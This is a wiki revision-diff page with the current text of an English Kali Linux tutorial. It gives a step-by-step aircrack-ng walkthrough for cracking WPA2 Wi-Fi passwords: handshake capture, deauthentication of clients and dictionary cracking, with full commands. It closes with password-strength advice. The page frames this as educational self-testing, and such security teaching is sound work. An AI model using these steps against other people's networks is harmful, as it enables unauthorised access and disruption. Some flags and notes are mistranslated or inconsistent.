Mainos / Advertisement:

Ero sivun ”Kali Linux/en” versioiden välillä

Kohteesta Taisto
Siirry navigaatioon Siirry hakuun
(Ak: Uusi sivu: Installing Kali Linux is very similar to Debian installation.)
 
(30 välissä olevaa versiota samalta käyttäjältä ei näytetä)
Rivi 4: Rivi 4:
 
Kali Linux contains for example password cracking software and WLAN cracking software (aircrack-ng).
 
Kali Linux contains for example password cracking software and WLAN cracking software (aircrack-ng).
  
These instructions are for ""educational use"".
+
These instructions are for educational use.
  
 
== Installation ==
 
== Installation ==
Rivi 12: Rivi 12:
 
Installing Kali Linux is very similar to [[Debian#Asennus|Debian]] installation.
 
Installing Kali Linux is very similar to [[Debian#Asennus|Debian]] installation.
  
== Paketit ==
+
== Packages ==
  
Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.
+
List of packages that you can use to test your security. The point of these instructions is to demonstrate how easy it can be to crack into different kinds of systems and to help you improve your security.
  
<span style="color:red;"> HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä! </span>
+
<span style="color:red;"> NOTE! Cracking into your own systems is legal and moral. Cracking into the systems of other people without their consent is forbidden. </span>
  
[[File:Loic skiddie.jpg|Älä ole script kiddy]]
+
[[File:Loic skiddie.jpg|Don't be a script kiddy]]
  
 
=== aircrack-ng ===
 
=== aircrack-ng ===
  
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
+
This package is used to crack WLAN networks.
  
  
1. Avataan root terminaali
+
1. We open terminal in root
  
2. Määritetään langaton verkkokortti
+
2. We specify the wireless NIC
  
   airmon-ng aloittaa wlan0
+
   airmon-ng starts wlan0
  
3. Tämä komento listaa kaikki lähialueen WLAN-verkot
+
3. This command lists all the WLAN networks near you
  
 
   airodump-ng mon0
 
   airodump-ng mon0
  
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.
+
4. Now we focus on a certain access point and wait for connection to be formed
  
 
   airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
 
   airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  
* bssid = MAC osoite tukiasemasta
+
*bssid = MAC address of the access point
* write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen
+
*write WPAcrack = Directory where aircrack will write to -> root of your home folder
  
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.
+
5. Leave the current terminal window open in the background and open a new one
  
 
   aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
 
   aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  
* --deauth 100 = Katkaise yhteys 100 kertaa
+
*--deauth 100 = Sever the connection 100 times
* –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
+
*-a 00:14:BF:E0:E8:D5 = BSSID from the access point
* –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta
+
*-c 4C:EB:42:59:DE:31 = BSSID from the client device
  
Jos virhe
+
If error
  
 
   Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 
   Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 
   Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
 
   Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
  
aja komento (sammuta palvelu)  
+
run command (shut down service)  
  
 
   /etc/init.d/network-manager stop
 
   /etc/init.d/network-manager stop
  
Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5
+
Soon the other terminal window will print WPA handshake: 00:14:BF:E0:E8:D5
  
6. Aletaan siis se oikea murtaminen.
+
6. Begin with the actual cracking
  
 
   aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]
 
   aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]
  
Esimerkiksi:
+
For example:
  
 
   aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
 
   aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  
* WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
+
*WPAcrack-01.cap = File with the hash from the password
* /usr/share/wordlist/* = polku salasana tiedostoon
+
* /usr/share/wordlist/* = file path to the password file
  
Sitten vain odotetaan että hash on purettu.
+
Then we just wait for the software to finish cracking
  
Tulostuu KEY FOUND: [salasanasi]
+
It will print KEY FOUND: [password]
  
  
==== Paranna WLAN verkkosi tietoturvaa ====
+
==== Enhance your WLAN network security ====
  
Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.  
+
As your security protocols you should use at least WPA2-PSK / WPA2-PERSONAL. These are still crackable by following our instructions though.  
  
* käyttämällä pitkää, yli 8 merkkistä salasanaa
+
*Use a long password, preferably over 8 characters
* Isoja ja pieniä kirjaimia
+
*Uppercase and lowercase letters
* erikoismerkkejä
+
*Special characters
* numeroita
+
*Numbers
* ei ole mikään sana tai lause
+
*Preferably not a word or a sentence
  
== Lähteet ==
+
== Sources ==
  
 
http://www.kali.org/
 
http://www.kali.org/

Nykyinen versio 28. tammikuuta 2015 kello 20.25

Muut kielet:
English • ‎suomi

Kali Linux is a Debian-derived Linux distribution with focus on digital forensics and penetration testing.

Kali Linux contains for example password cracking software and WLAN cracking software (aircrack-ng).

These instructions are for educational use.

Installation

Download Kali Linux http://www.kali.org/downloads/, we recommend downloading it via torrent for improved speed.

Installing Kali Linux is very similar to Debian installation.

Packages

List of packages that you can use to test your security. The point of these instructions is to demonstrate how easy it can be to crack into different kinds of systems and to help you improve your security.

NOTE! Cracking into your own systems is legal and moral. Cracking into the systems of other people without their consent is forbidden.

Don't be a script kiddy

aircrack-ng

This package is used to crack WLAN networks.


1. We open terminal in root

2. We specify the wireless NIC

 airmon-ng starts wlan0

3. This command lists all the WLAN networks near you

 airodump-ng mon0

4. Now we focus on a certain access point and wait for connection to be formed

 airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  • bssid = MAC address of the access point
  • write WPAcrack = Directory where aircrack will write to -> root of your home folder

5. Leave the current terminal window open in the background and open a new one

 aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  • --deauth 100 = Sever the connection 100 times
  • -a 00:14:BF:E0:E8:D5 = BSSID from the access point
  • -c 4C:EB:42:59:DE:31 = BSSID from the client device

If error

 Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

run command (shut down service)

 /etc/init.d/network-manager stop

Soon the other terminal window will print WPA handshake: 00:14:BF:E0:E8:D5

6. Begin with the actual cracking

 aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]

For example:

 aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  • WPAcrack-01.cap = File with the hash from the password
  • /usr/share/wordlist/* = file path to the password file

Then we just wait for the software to finish cracking

It will print KEY FOUND: [password]


Enhance your WLAN network security

As your security protocols you should use at least WPA2-PSK / WPA2-PERSONAL. These are still crackable by following our instructions though.

  • Use a long password, preferably over 8 characters
  • Uppercase and lowercase letters
  • Special characters
  • Numbers
  • Preferably not a word or a sentence

Sources

http://www.kali.org/

http://fi.wikipedia.org/wiki/Kali_Linux

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

http://sarajarvi.org/tutoriaalit-wpa-murto/

Mainos / Advertisement: